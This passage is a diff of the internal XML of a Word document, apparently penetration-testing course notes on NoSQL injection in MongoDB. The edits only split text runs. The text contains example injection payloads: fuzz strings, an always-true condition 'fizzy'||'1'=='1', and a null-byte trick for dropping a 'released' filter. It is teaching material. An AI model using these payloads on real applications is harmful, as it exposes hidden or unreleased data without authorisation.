--- a/Level2-Webpenetrationtesting/nosql-injection.docx
+++ b/Level2-Webpenetrationtesting/nosql-injection.docx
@@ -672,31 +672,7 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>However,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the nature of the attack varies significantly, as NoSQL databases use a range of query languages, types of query syntax, and different data structures.</w:t>
+        <w:t>. However, the nature of the attack varies significantly, as NoSQL databases use a range of query languages, types of query syntax, and different data structures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -804,7 +780,31 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>You can potentially detect NoSQL injection vulnerabilities by attempting to break the query syntax. To do this, systematically test each input by submitting fuzz strings and special characters that trigger a database error or some other detectable behavior if they're not adequately sanitized or filtered by the application.</w:t>
+        <w:t xml:space="preserve">You can potentially detect NoSQL injection vulnerabilities by attempting to break the query syntax. To do this, systematically test each input by submitting fuzz strings and special characters that trigger a database error or some other detectable </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>behavior</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> if they're not adequately sanitized or filtered by the application.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -993,18 +993,35 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == 'fizzy'</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 'fizzy'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1096,18 +1113,33 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>;$Foo}</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Foo}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1136,8 +1168,23 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>$Foo \xYZ</w:t>
-      </w:r>
+        <w:t>$Foo \</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xYZ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1309,7 +1356,63 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>'\"`{\r;$Foo}\n$Foo \\xYZ\u0000</w:t>
+        <w:t>'\"`{\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>r;$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Foo}\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>n$Foo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> \\xYZ\u0000</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1412,18 +1515,35 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == '''</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == '''</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1485,18 +1605,35 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == '\''</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == '\''</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1550,8 +1687,23 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Confirming conditional behavior</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Confirming conditional </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>behavior</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1574,7 +1726,31 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>After detecting a vulnerability, the next step is to determine whether you can influence boolean conditions using NoSQL syntax.</w:t>
+        <w:t xml:space="preserve">After detecting a vulnerability, the next step is to determine whether you can influence </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>boolean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> conditions using NoSQL syntax.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1598,7 +1774,31 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>To test this, send two requests, one with a false condition and one with a true condition. For example you could use the conditional statements </w:t>
+        <w:t xml:space="preserve">To test this, send two requests, one with a false condition and one with a true condition. For </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>example</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you could use the conditional statements </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1747,7 +1947,31 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Now that you have identified that you can influence boolean conditions, you can attempt to override existing conditions to exploit the vulnerability. For example, you can inject a JavaScript condition that always evaluates to true, such as </w:t>
+        <w:t xml:space="preserve">Now that you have identified that you can influence </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>boolean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> conditions, you can attempt to override existing conditions to exploit the vulnerability. For example, you can inject a JavaScript condition that always evaluates to true, such as </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1835,18 +2059,35 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == 'fizzy'||'1'=='1'</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 'fizzy'||'1'=='1'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1974,6 +2215,8 @@
         </w:rPr>
         <w:t>You could also add a null character after the category value. MongoDB may ignore all characters after a null character. This means that any additional conditions on the MongoDB query are ignored. For example, the query may have an additional </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -1986,6 +2229,8 @@
         </w:rPr>
         <w:t>this.released</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2010,18 +2255,63 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == 'fizzy' &amp;&amp; this.released == 1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 'fizzy' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.released</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2047,6 +2337,8 @@
         </w:rPr>
         <w:t>The restriction </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -2057,7 +2349,21 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>this.released == 1</w:t>
+        <w:t>this.released</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2070,6 +2376,8 @@
         </w:rPr>
         <w:t> is used to only show products that are released. For unreleased products, presumably </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -2080,7 +2388,21 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>this.released == 0</w:t>
+        <w:t>this.released</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 0</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2180,18 +2502,63 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>this.category == 'fizzy'\u0000' &amp;&amp; this.released == 1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 'fizzy'\u0000' &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this.released</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
